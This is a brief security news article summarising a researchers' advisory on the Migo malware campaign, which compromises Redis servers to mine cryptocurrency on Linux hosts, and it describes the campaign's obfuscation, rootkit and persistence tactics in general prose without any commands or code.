Security experts have recently discovered a highly sophisticated malware campaign targeting Redis, a popular data storage system. This malicious campaign, known as “Migo,” utilizes innovative tactics to compromise Redis servers with the ultimate goal of mining cryptocurrency on Linux hosts.
Cado Security Labs researchers have identified that Migo uses new Redis system weakening commands to exploit the data store for cryptojacking purposes. Unlike previous attacks on Redis, this campaign introduces unique techniques to compromise the system’s security.
According to a recent advisory, Migo is distributed as a Golang ELF binary, featuring compile-time obfuscation and the ability to persist on Linux hosts. Additionally, the malware incorporates a modified version of a popular user-mode rootkit to conceal processes and on-disk artifacts.
The initial stage of the attack involves disabling various Redis configuration options using specific CLI commands. Attackers disable features like protected mode and replica-read-only to facilitate their malicious activities.
Once access is gained, the attackers set up commands to execute malicious payloads retrieved from external sources such as Transfer.sh and Pastebin. These payloads are designed to mine cryptocurrency in the background while remaining undetected.
One notable aspect of Migo is its use of compile-time obfuscation to conceal important symbols and strings, making reverse-engineering efforts more challenging. Additionally, the malware employs a user-mode rootkit to hide its processes and on-disk artifacts, complicating detection and mitigation efforts.
The campaign’s persistence mechanism involves using systemd service and timer units to ensure continuous execution of the malware. Furthermore, Migo attempts to evade detection by modifying the system’s host file to block outbound traffic to domains associated with cloud providers.
Cado Security highlighted that “Migo demonstrates that cloud-focused attackers are continuing to refine their techniques and improve their ability to exploit web-facing services.” Additionally, the use of a user-mode rootkit could complicate post-incident forensics of hosts compromised by Migo.
In conclusion, the Migo malware campaign represents a significant threat to Redis servers and Linux hosts, showcasing the evolving tactics of cyber attackers in compromising systems for cryptocurrency mining purposes. It is crucial for organizations to stay vigilant and implement robust security measures to protect against such sophisticated threats.